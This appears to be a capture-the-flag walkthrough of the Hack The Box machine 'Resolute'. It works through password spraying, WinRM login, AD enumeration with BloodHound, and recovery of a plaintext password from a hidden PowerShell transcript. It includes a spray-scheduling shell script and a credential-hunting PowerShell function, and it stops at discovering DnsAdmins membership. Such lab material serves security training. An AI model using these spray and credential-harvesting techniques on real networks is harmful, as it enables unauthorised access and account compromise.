└─$ evil-winrm -i 10.10.10.169 -u marko -p 'Welcome123!'              
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
                                        
Error: An error of type WinRM::WinRMAuthorizationError happened, message is WinRM::WinRMAuthorizationError
                                        
Error: Exiting with code 1

Tried netshareenum over the rpcclient null session; the srvsvc pipe is refused:

┌──(kali㉿kali)-[~]
└─$ rpcclient -U '' -N 10.10.10.169
rpcclient $> netshareenum
do_cmd: Could not initialise srvsvc. Error was NT_STATUS_ACCESS_DENIED
rpcclient $> netshareenum^C


Tried nmap's smb-enum-shares script; it sat in the script scan making no progress and was abandoned:

┌──(kali㉿kali)-[~]
└─$ nmap -p 445 --script smb-enum-shares 10.10.10.169 -Pn

Starting Nmap 7.94 ( https://nmap.org ) at 2023-09-15 22:28 EDT
Stats: 0:05:52 elapsed; 0 hosts completed (1 up), 1 undergoing Script Scan
NSE Timing: About 0.00% done

Spray Welcome123! across the whole user list. With Account Lockout Threshold: None this cannot lock anyone out. The password no longer works for marko, but melanie authenticates with it at the end:

└─$ crackmapexec smb 10.10.10.169 -u users.txt -p 'Welcome123!'

SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\administrator:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\Guest:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\DefaultAccount:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\RESOLUTE$:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\MS02$:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\ryan:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marko:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\sunita:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\abigail:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\marcus:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\sally:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\fred:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\angela:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\felicia:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\gustavo:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\ulf:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\stevie:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\claire:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\paulo:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\steve:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\annette:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\annika:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\per:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [-] megabank.local\claude:Welcome123! STATUS_LOGON_FAILURE 
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\melanie:Welcome123! 
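The lockout policy dumped earlier (Account Lockout Threshold: None, Reset Account Lockout Counter: 30 minutes) is what makes the spray above safe, and on a real engagement it should set the pace. The following is an added example (shell, not part of the original notes) that parses those --pass-pol lines and prints a sweep schedule: one password per pass over users.txt, which costs each account one attempt, with a pause of one reset window between passes when a threshold exists. The commands are printed, not executed; the policy sample is copied from the output above, the thresholds used in the usage note are invented. It assumes crackmapexec's --continue-on-success flag.

```shell
#!/bin/sh
# Added example (not from the original notes): read the lockout settings out of
# `crackmapexec smb <ip> --pass-pol` output and turn them into a spray schedule.
# Commands are printed, not run. Assumes crackmapexec's --continue-on-success flag
# and the column layout crackmapexec prints.

# Constructed sample; values copied from the policy dumped on the box.
SAMPLE_POLICY='SMB         10.10.10.169    445    RESOLUTE         Minimum password length: 7
SMB         10.10.10.169    445    RESOLUTE         Reset Account Lockout Counter: 30 minutes 
SMB         10.10.10.169    445    RESOLUTE         Locked Account Duration: 30 minutes 
SMB         10.10.10.169    445    RESOLUTE         Account Lockout Threshold: None'

# load_policy "<--pass-pol output>": sets THRESHOLD (text after the colon) and RESET_MIN.
load_policy() {
    THRESHOLD=$(printf '%s\n' "$1" | sed -n 's/.*Account Lockout Threshold: *//p' | sed 's/ *$//')
    RESET_MIN=$(printf '%s\n' "$1" | sed -n 's/.*Reset Account Lockout Counter: *\([0-9][0-9]*\) minutes.*/\1/p')
    [ -n "$RESET_MIN" ] || RESET_MIN=0
}

# Attempts per account that are safe inside one reset window:
# -1 = no lockout policy, otherwise threshold minus one as a safety margin.
spray_budget() {
    case "$THRESHOLD" in
        None|none|0|'') echo -1 ;;
        *) n=${THRESHOLD%%[!0-9]*}
           if [ -n "$n" ] && [ "$n" -gt 1 ]; then echo $(( n - 1 )); else echo 0; fi ;;
    esac
}

# spray_plan pw1 pw2 ...: one password per sweep over users.txt (= one attempt per
# account), with a pause of one reset window between sweeps when a threshold exists.
spray_plan() {
    budget=$(spray_budget)
    if [ "$budget" -eq 0 ]; then
        echo "refusing: lockout threshold too low to spray safely (THRESHOLD=$THRESHOLD)" >&2
        return 1
    fi
    for pw in "$@"; do
        printf "crackmapexec smb 10.10.10.169 -u users.txt -p '%s' --continue-on-success\n" "$pw"
        if [ "$budget" -gt 0 ]; then
            printf 'sleep %d   # one reset window before the next sweep\n' $(( RESET_MIN * 60 ))
        fi
    done
    return 0
}

# Live use: load_policy "$(crackmapexec smb 10.10.10.169 --pass-pol)"
load_policy "$SAMPLE_POLICY"
spray_plan 'Welcome123!' 'Summer2023!'
```

With no threshold the plan has no sleeps between sweeps. With an invented threshold of 5 the budget is 4 and each sweep is followed by a 1800 second pause; with a threshold of 1 the plan is refused, since a single wrong guess would lock the account.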

Check WinRM with crackmapexec: Pwn3d! means melanie can log in over WinRM. Connect with evil-winrm and grab user.txt:

┌──(kali㉿kali)-[~/HTB/resolute]
└─$ crackmapexec winrm 10.10.10.169 -u melanie -p 'Welcome123!'
SMB         10.10.10.169    5985   RESOLUTE         [*] Windows 10.0 Build 14393 (name:RESOLUTE) (domain:megabank.local)
HTTP        10.10.10.169    5985   RESOLUTE         [*] http://10.10.10.169:5985/wsman
WINRM       10.10.10.169    5985   RESOLUTE         [+] megabank.local\melanie:Welcome123! (Pwn3d!)
                                                                                                                     
┌──(kali㉿kali)-[~/HTB/resolute]
└─$ evil-winrm -i 10.10.10.169 -u melanie -p 'Welcome123!'
                                        
Evil-WinRM shell v3.5
                                        
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
                                        
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
                                        
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\melanie\Documents> cd ../
*Evil-WinRM* PS C:\Users\melanie> cd Desktop
*Evil-WinRM* PS C:\Users\melanie\Desktop> ls


    Directory: C:\Users\melanie\Desktop


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-ar---        9/15/2023   7:03 PM             34 user.txt


*Evil-WinRM* PS C:\Users\melanie\Desktop> cat user.txt
fb18e2daec48bf3f4ff7430139441feb
*Evil-WinRM* PS C:\Users\melanie\Desktop> 

checking shares that melanie can read

└─$ crackmapexec smb 10.10.10.169 -u melanie -p Welcome123! --shares
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\melanie:Welcome123! 
SMB         10.10.10.169    445    RESOLUTE         [+] Enumerated shares
SMB         10.10.10.169    445    RESOLUTE         Share           Permissions     Remark
SMB         10.10.10.169    445    RESOLUTE         -----           -----------     ------
SMB         10.10.10.169    445    RESOLUTE         ADMIN$                          Remote Admin
SMB         10.10.10.169    445    RESOLUTE         C$                              Default share
SMB         10.10.10.169    445    RESOLUTE         IPC$                            Remote IPC
SMB         10.10.10.169    445    RESOLUTE         NETLOGON        READ            Logon server share 
SMB         10.10.10.169    445    RESOLUTE         SYSVOL          READ            Logon server share 

We will try winPEAS; at a glance nothing looked glaring. Will re-check later.

Info: Upload successful!
*Evil-WinRM* PS C:\Users\melanie\Documents> ./winPEASx64.exe
ANSI color bit for Windows is not set. If you are executing this from a Windows terminal inside the host you should run 'REG ADD HKCU\Console /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD
Long paths are disabled, so the maximum length of a path supported is 260 chars (this may cause false negatives when looking for files). If you are admin, you can enable it with 'REG ADD HKLM\SYSTEM\CurrentControlSet\Control\FileSystem /v VirtualTerminalLevel /t REG_DWORD /d 1' and then start a new CMD

               ((((((((((((((((((((((((((((((((
        (((((((((((((((((((((((((((((((((((((((((((
      ((((((((((((((**********/##########(((((((((((((
    ((((((((((((********************/#######(((((((((((
    ((((((((******************/@@@@@/****######((((((((((
    ((((((********************@@@@@@@@@@/***,####((((((((((
    (((((********************/@@@@@%@@@@/********##(((((((((
    (((############*********/%@@@@@@@@@/************((((((((
    ((##################(/******/@@@@@/***************((((((
    ((#########################(/**********************(((((
    ((##############################(/*****************(((((
    ((###################################(/************(((((
    ((#######################################(*********(((((
    ((#######(,.***.,(###################(..***.*******(((((
    ((#######*(#####((##################((######/(*****(((((
    ((###################(/***********(##############()(((((
    (((#####################/*******(################)((((((
    ((((############################################)((((((
    (((((##########################################)(((((((
    ((((((########################################)(((((((
    ((((((((####################################)((((((((
    (((((((((#################################)(((((((((
        ((((((((((##########################)(((((((((
              ((((((((((((((((((((((((((((((((((((((
                 ((((((((((((((((((((((((((((((

ADVISORY: winpeas should be used for authorized penetration testing and/or educational purposes only.Any misuse of this software will not be the responsibility of the author or of any other collaborator. Use it at your own devices and/or with the device owner's permission.

  WinPEAS-ng by @hacktricks_live

       /---------------------------------------------------------------------------------\                           
       |                             Do you like PEASS?                                  |                           
       |---------------------------------------------------------------------------------|                           
       |         Get the latest version    :     https://github.com/sponsors/carlospolop |                           
       |         Follow on Twitter         :     @hacktricks_live                        |                           
       |         Respect on HTB            :     SirBroccoli                             |                           
       |---------------------------------------------------------------------------------|                           
       |                                 Thank you!                                      |                           
       \---------------------------------------------------------------------------------/                           
                                                                                                                     
  [+] Legend:
         Red                Indicates a special privilege over an object or something is misconfigured
         Green              Indicates that some protection is enabled or something is well configured
         Cyan               Indicates active users
         Blue               Indicates disabled users
         LightYellow        Indicates links

 You can find a Windows local PE Checklist here: https://book.hacktricks.xyz/windows

bloodhound-python

┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-3.0.5/Ingestors]
└─$ bloodhound-python -u melanie -p 'Welcome123!' -ns 10.10.10.169 -d megabank.local -c all
INFO: Found AD domain: megabank.local
INFO: Connecting to LDAP server: Resolute.megabank.local
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: Resolute.megabank.local
INFO: Found 27 users
INFO: Found 53 groups
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: MS02.megabank.local
INFO: Querying computer: Resolute.megabank.local
INFO: Done in 00M 57S

will try sharphound/bloodhound

*Evil-WinRM* PS C:\Users\melanie\Documents> ./SharpHound.exe
-----------------------------------------------
Initializing SharpHound at 7:57 AM on 9/16/2023
-----------------------------------------------

Resolved Collection Methods: Group, Sessions, Trusts, ACL, ObjectProps, LocalGroups, SPNTargets, Container

[+] Creating Schema map for domain MEGABANK.LOCAL using path CN=Schema,CN=Configuration,DC=MEGABANK,DC=LOCAL
[+] Cache File not Found: 0 Objects in cache

[+] Pre-populating Domain Controller SIDS
Status: 0 objects finished (+0) -- Using 19 MB RAM
Status: 88 objects finished (+88 ∞)/s -- Using 27 MB RAM
Enumeration finished in 00:00:00.4523615
Compressing data to .\20230916075709_BloodHound.zip
You can upload this file directly to the UI

SharpHound Enumeration Completed at 7:57 AM on 9/16/2023! Happy Graphing!

*Evil-WinRM* PS C:\Users\melanie\Documents> ls


    Directory: C:\Users\melanie\Documents


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-a----        9/16/2023   7:57 AM          10694 20230916075709_BloodHound.zip
-a----        9/16/2023   7:57 AM          15793 NGFkZWM1ODktZGZiMS00YWJmLTk0OTMtMTFkMTllMjIxYmUx.bin
-a----        9/16/2023   7:56 AM         833536 SharpHound.exe
-a----        9/16/2023   7:39 AM        2387968 winPEASx64.exe


*Evil-WinRM* PS C:\Users\melanie\Documents> download 20230916075709_BloodHound.zip
                                        
Info: Downloading C:\Users\melanie\Documents\20230916075709_BloodHound.zip to 20230916075709_BloodHound.zip
                                        
Info: Download successful!
*Evil-WinRM* PS C:\Users\melanie\Documents> 

tried aclpwn but no luck

┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-linux-x64]
└─$ ~/.local/bin/aclpwn -f melanie@megabank.local -t megabank.local -tt domain --database 127.0.0.1 -du neo4j -dp password -s 10.10.10.169 -sp 'Welcome123!' 
[!] No path found!
                                                                                                                     
┌──(kali㉿kali)-[~/Downloads/Bloodhound_3/BloodHound-linux-x64]
└─$ 

Reviewing the winPEAS output again, it flagged some hidden directories under C:\Users:

╔══════════╣ Looking inside the Recycle Bin for creds files
╚  https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#credentials-inside-files
    Not Found

╔══════════╣ Searching hidden files or folders in C:\Users home (can be slow)
                                                                                                                     
     C:\Users\Default
     C:\Users\Default User
     C:\Users\Default
     C:\Users\All Users

╔══════════╣ Searching interesting files in other users home directories (can be slow)

Checking each of these folders. C:\Users\Default holds an NTUSER.DAT, which we download (note that Default is the template profile copied for new users, so its hive rarely contains anything user-specific).

*Evil-WinRM* PS C:\Users\Default> ls


    Directory: C:\Users\Default


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-r---        7/16/2016   6:18 AM                Desktop
d-r---        9/25/2019  10:17 AM                Documents
d-r---        7/16/2016   6:18 AM                Downloads
d-r---        7/16/2016   6:18 AM                Favorites
d-r---        7/16/2016   6:18 AM                Links
d-r---        7/16/2016   6:18 AM                Music
d-r---        7/16/2016   6:18 AM                Pictures
d-----        7/16/2016   6:18 AM                Saved Games
d-r---        7/16/2016   6:18 AM                Videos
-a----        12/4/2019   5:17 AM         262144 NTUSER.DAT


*Evil-WinRM* PS C:\Users\Default> cd Documents
*Evil-WinRM* PS C:\Users\Default\Documents> ls
*Evil-WinRM* PS C:\Users\Default\Documents> cd C:\Users\"All Users"
*Evil-WinRM* PS C:\Users\All Users> ls


    Directory: C:\Users\All Users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d---s-       11/20/2016   6:36 PM                Microsoft
d-----        9/25/2019  10:48 AM                Package Cache
d-----        9/25/2019  10:17 AM                regid.1991-06.com.microsoft
d-----        7/16/2016   6:18 AM                SoftwareDistribution
d-----       11/20/2016   6:19 PM                USOPrivate
d-----       11/20/2016   6:19 PM                USOShared
d-----        9/25/2019  10:48 AM                VMware


*Evil-WinRM* PS C:\Users\All Users> cd VMware
*Evil-WinRM* PS C:\Users\All Users\VMware> ls


    Directory: C:\Users\All Users\VMware


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----        9/25/2019  10:48 AM                VMware CAF
d-----        9/25/2019  10:49 AM                VMware Tools
d-----        9/25/2019  10:48 AM                VMware VGAuth


*Evil-WinRM* PS C:\Users\All Users\VMware> cd ----                -------------         ------ ----
^C
                                        
Warning: Press "y" to exit, press any other key to continue
*Evil-WinRM* PS C:\Users\All Users\VMware> cd C:\Users\"Default User"
*Evil-WinRM* PS C:\Users\Default User> ls
Access to the path 'C:\Users\Default User' is denied.
At line:1 char:1
+ ls
+ ~~
    + CategoryInfo          : PermissionDenied: (C:\Users\Default User:String) [Get-ChildItem], UnauthorizedAccessException
    + FullyQualifiedErrorId : DirUnauthorizedAccessError,Microsoft.PowerShell.Commands.GetChildItemCommand
*Evil-WinRM* PS C:\Users\Default User> 

Wild goose chase trying to enumerate NTUSER.DAT, so I gave up after trying:

┌──(kali㉿kali)-[~/…/Bloodhound_3/BloodHound-linux-x64/RegRipper3.0/plugins]
└─$ perl /home/kali/Downloads/Bloodhound_3/BloodHound-linux-x64/RegRipper3.0/rip.pl -r /home/kali/HTB/resolute/NTUSER.DAT -f ntuser

Parsed Plugins file.
Error in : Can't locate plugins/.pl in @INC (@INC contains: /etc/perl /usr/local/lib/x86_64-linux-gnu/perl/5.36.0 /usr/local/share/perl/5.36.0 /usr/lib/x86_64-linux-gnu/perl5/5.36 /usr/share/perl5 /usr/lib/x86_64-linux-gnu/perl-base /usr/lib/x86_64-linux-gnu/perl/5.36 /usr/share/perl/5.36 /usr/local/lib/site_perl) at /home/kali/Downloads/Bloodhound_3/BloodHound-linux-x64/RegRipper3.0/rip.pl line 199.

 complete.
----------------------------------------
                                                                                                                                                                                   

Viewing hidden files with PowerShell. We run it in C:\

Get-ChildItem -Hidden (alias: gci -Hidden) lists only the hidden items; Get-ChildItem -Force lists hidden items alongside the normal ones. ls -a is the Unix form and does not do this here: in PowerShell ls is just an alias for Get-ChildItem, and -a is not a hidden-files switch.
*Evil-WinRM* PS C:\> Get-ChildItem -Hidden


    Directory: C:\


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--hs-        9/16/2023   7:41 AM                $RECYCLE.BIN
d--hsl        9/25/2019  10:17 AM                Documents and Settings
d--h--        9/25/2019  10:48 AM                ProgramData
d--h--        12/3/2019   6:32 AM                PSTranscripts
d--hs-        9/25/2019  10:17 AM                Recovery
d--hs-        9/25/2019   6:25 AM                System Volume Information
-arhs-       11/20/2016   5:59 PM         389408 bootmgr
-a-hs-        7/16/2016   6:10 AM              1 BOOTNXT
-a-hs-        9/16/2023   7:31 AM      402653184 pagefile.sys


*Evil-WinRM* PS C:\> 

Inside C:\PSTranscripts a plain ls shows nothing, so we list hidden items and find the folder 20191203, which we download to Kali. That folder is also empty to a plain ls; listing hidden items there reveals "PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt".

*Evil-WinRM* PS C:\> cd PSTranscripts
*Evil-WinRM* PS C:\PSTranscripts> ls
*Evil-WinRM* PS C:\PSTranscripts> Get-ChildItem -Hidden



    Directory: C:\PSTranscripts


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d--h--        12/3/2019   6:45 AM                20191203


*Evil-WinRM* PS C:\PSTranscripts> 
*Evil-WinRM* PS C:\PSTranscripts> download 20191203
                                        
Info: Downloading C:\PSTranscripts\20191203 to 20191203
                                        
Info: Download successful!
*Evil-WinRM* PS C:\PSTranscripts> 



    Directory: C:\PSTranscripts\20191203


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
-arh--        12/3/2019   6:45 AM           3732 PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt


*Evil-WinRM* PS C:\PSTranscripts\20191203> download PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
                                        
Info: Downloading C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt to PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt                                                                        
                                        
Error: Download failed. Check filenames or paths: uninitialized constant WinRM::FS::FileManager::EstandardError
                                                                                                                      
          rescue EstandardError => err                                                                                
                 ^^^^^^^^^^^^^^                                                                                       
Did you mean?  StandardError                                                                                          
*Evil-WinRM* PS C:\PSTranscripts\20191203> download "PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt"
                                        
Info: Downloading C:\PSTranscripts\20191203\PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt to PowerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt                                                                        
                                        
Error: Download failed. Check filenames or paths: uninitialized constant WinRM::FS::FileManager::EstandardError
                                                                                                                      
          rescue EstandardError => err                                                                                
                 ^^^^^^^^^^^^^^                                                                                       
Did you mean?  StandardError                                                                                          
*Evil-WinRM* PS C:\PSTranscripts\20191203> cat powerShell_transcript.RESOLUTE.OJuoBGhU.20191203063201.txt
**********************

The transcript captured a net use command with ryan's password on the command line: Serv3r4Admin4cc123! (the command itself was malformed, hence the "syntax of this command" errors, but PowerShell transcription records every command line verbatim, so any secret passed as an argument lands on disk in plaintext regardless of whether the command worked).

PS>CommandInvocation(Out-String): "Out-String"
>> ParameterBinding(Out-String): name="InputObject"; value="The syntax of this command is:"
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
cmd : The syntax of this command is:
At line:1 char:1
+ cmd /c net use X: \\fs01\backups ryan Serv3r4Admin4cc123!
+ ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
    + CategoryInfo          : NotSpecified: (The syntax of this command is::String) [], RemoteException
    + FullyQualifiedErrorId : NativeCommandError
**********************
Windows PowerShell transcript start
Start time: 20191203063515
Username: MEGABANK\ryan
RunAs User: MEGABANK\ryan
Machine: RESOLUTE (Microsoft Windows NT 10.0.14393.0)
Host Application: C:\Windows\system32\wsmprovhost.exe -Embedding
Process ID: 2800
PSVersion: 5.1.14393.2273
PSEdition: Desktop
PSCompatibleVersions: 1.0, 2.0, 3.0, 4.0, 5.0, 5.1.14393.2273
BuildVersion: 10.0.14393.2273
CLRVersion: 4.0.30319.42000
WSManStackVersion: 3.0
PSRemotingProtocolVersion: 2.3
SerializationVersion: 1.1.0.1
**********************
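A sweep for this class of leak, as an added example rather than anything from the original notes: it walks the usual transcript locations with -Force (the folder and file above were both hidden), and flags command lines that carry credentials the way the net use line did. The root paths, regex patterns and output shape are this example's own choices; the RunAs attribution comes from the header every PowerShell transcript writes.

```powershell
# Added example, not from the original notes: hunt hidden PowerShell transcripts
# (and other text logs) for command lines that carry credentials, the way ryan's
# password leaked above. -Force is what makes hidden folders such as
# C:\PSTranscripts\20191203 and hidden transcript files visible.

function Find-TranscriptCreds {
    param(
        [string[]] $Roots   = @('C:\PSTranscripts', 'C:\Transcripts', 'C:\ProgramData', 'C:\Users'),
        [string[]] $Include = @('PowerShell_transcript*.txt', '*.log', '*.ps1', '*.txt')
    )

    # Each pattern names a place secrets habitually appear on a command line.
    $patterns = [ordered]@{
        'net use'          = '(?i)\bnet\s+use\b\s+\S+\s+\\\\\S+\s+\S+'          # net use X: \\srv\share <pw|/user:..>
        'password switch'  = '(?i)(?:-p|--password|/p(?:ass(?:word)?)?|/pwd|-pw)(?:[:=]|\s+)\S+'
        'plaintext secure' = '(?i)ConvertTo-SecureString\b.*-AsPlainText'
        'PSCredential'     = '(?i)PSCredential\s*\('
        'runas/psexec'     = '(?i)\b(?:runas|psexec|wmic)\b.*(?:/user:|-u\s)\S+'
    }

    $files = Get-ChildItem -Path $Roots -Recurse -Force -File -Include $Include -ErrorAction SilentlyContinue
    foreach ($f in $files) {
        # Other users' profiles are usually unreadable; skip rather than abort.
        try { $lines = [System.IO.File]::ReadAllLines($f.FullName) } catch { continue }

        # PowerShell transcripts record who ran the session in their header.
        $header = $lines | Where-Object { $_ -match '^\s*RunAs User:\s*\S' } | Select-Object -First 1
        $who    = $header -replace '^\s*RunAs User:\s*', ''

        for ($i = 0; $i -lt $lines.Count; $i++) {
            foreach ($name in $patterns.Keys) {
                if ($lines[$i] -match $patterns[$name]) {
                    [pscustomobject]@{
                        File   = $f.FullName
                        Line   = $i + 1
                        RunAs  = $who
                        Reason = $name
                        Text   = $lines[$i].Trim()
                    }
                    break   # one hit per line is enough
                }
            }
        }
    }
}

# On this box the transcript above should come back as 'net use' hits attributed to MEGABANK\ryan.
Find-TranscriptCreds | Format-Table -AutoSize -Wrap
```

The patterns deliberately match the command line rather than the word "password": a transcript reproduces what was typed, including the `+ cmd /c net use ...` echo in error records, so a leak shows up even when the command failed, exactly as it did here.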

Enumerate ryan. The first attempt below stalls at the dquote> prompt: with the password in double quotes the ! is still subject to zsh history expansion, and the shell ends up waiting for a closing quote. Single-quote the password, as was done for melanie, or leave it unquoted when the ! is the last character of the word.

┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 10.10.10.169 -u ryan -p "Serv3r4Admin4cc123!"  
dquote> 
                                                                                                                     
┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 10.10.10.169 -u ryan -p Serv3r4Admin4cc123! 
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\ryan:Serv3r4Admin4cc123! (Pwn3d!)
                                                                                                                     
┌──(kali㉿kali)-[~]
└─$ crackmapexec smb 10.10.10.169 -u ryan -p Serv3r4Admin4cc123! --shares
SMB         10.10.10.169    445    RESOLUTE         [*] Windows Server 2016 Standard 14393 x64 (name:RESOLUTE) (domain:megabank.local) (signing:True) (SMBv1:True)
SMB         10.10.10.169    445    RESOLUTE         [+] megabank.local\ryan:Serv3r4Admin4cc123! (Pwn3d!)
SMB         10.10.10.169    445    RESOLUTE         [+] Enumerated shares
SMB         10.10.10.169    445    RESOLUTE         Share           Permissions     Remark
SMB         10.10.10.169    445    RESOLUTE         -----           -----------     ------
SMB         10.10.10.169    445    RESOLUTE         ADMIN$                          Remote Admin
SMB         10.10.10.169    445    RESOLUTE         C$                              Default share
SMB         10.10.10.169    445    RESOLUTE         IPC$                            Remote IPC
SMB         10.10.10.169    445    RESOLUTE         NETLOGON        READ            Logon server share 
SMB         10.10.10.169    445    RESOLUTE         SYSVOL          READ            Logon server share 

tried aclpwn again

┌──(kali㉿kali)-[~]
└─$ ~/.local/bin/aclpwn -f ryan@megabank.local -t megabank.local -tt domain --database 127.0.0.1 -du neo4j -dp password -s 10.10.10.169 -sp 'Serv3r4Admin4cc123!'
[!] No path found!
                                                                                                                     
┌──(kali㉿kali)-[~]
└─$ 

Group membership, from net user (which lists direct memberships only): *Domain Users *Contractors

*Evil-WinRM* PS C:\Users\ryan\Documents> net user /domain ryan
User name                    ryan
Full Name                    Ryan Bertrand
Comment
User's comment
Country/region code          000 (System Default)
Account active               Yes
Account expires              Never

Password last set            9/16/2023 9:27:02 AM
Password expires             Never
Password changeable          9/17/2023 9:27:02 AM
Password required            Yes
User may change password     Yes

Workstations allowed         All
Logon script
User profile
Home directory
Last logon                   Never

Logon hours allowed          All

Local Group Memberships
Global Group memberships     *Domain Users         *Contractors
The command completed successfully.

*Evil-WinRM* PS C:\Users\ryan\Documents> 

Check more information with whoami /all, which shows more than net user: it lists the full logon token, including memberships picked up indirectly through group nesting. net user showed only Domain Users and Contractors, but the token also carries MEGABANK\DnsAdmins. It is a domain-local group, so if ryan were a direct member net user would have listed it under Local Group Memberships; the membership must come through nesting.

*Evil-WinRM* PS C:\Users\ryan\Documents> whoami /all

USER INFORMATION
----------------

User Name     SID
============= ==============================================
megabank\ryan S-1-5-21-1392959593-3013219662-3596683436-1105


GROUP INFORMATION
-----------------

Group Name                                 Type             SID                                            Attributes
========================================== ================ ============================================== ===============================================================
Everyone                                   Well-known group S-1-1-0                                        Mandatory group, Enabled by default, Enabled group
BUILTIN\Users                              Alias            S-1-5-32-545                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Pre-Windows 2000 Compatible Access Alias            S-1-5-32-554                                   Mandatory group, Enabled by default, Enabled group
BUILTIN\Remote Management Users            Alias            S-1-5-32-580                                   Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\NETWORK                       Well-known group S-1-5-2                                        Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\Authenticated Users           Well-known group S-1-5-11                                       Mandatory group, Enabled by default, Enabled group
NT AUTHORITY\This Organization             Well-known group S-1-5-15                                       Mandatory group, Enabled by default, Enabled group
MEGABANK\Contractors                       Group            S-1-5-21-1392959593-3013219662-3596683436-1103 Mandatory group, Enabled by default, Enabled group
MEGABANK\DnsAdmins                         Alias            S-1-5-21-1392959593-3013219662-3596683436-1101 Mandatory group, Enabled by default, Enabled group, Local Group
NT AUTHORITY\NTLM Authentication           Well-known group S-1-5-64-10                                    Mandatory group, Enabled by default, Enabled group
Mandatory Label\Medium Mandatory Level     Label            S-1-16-8192
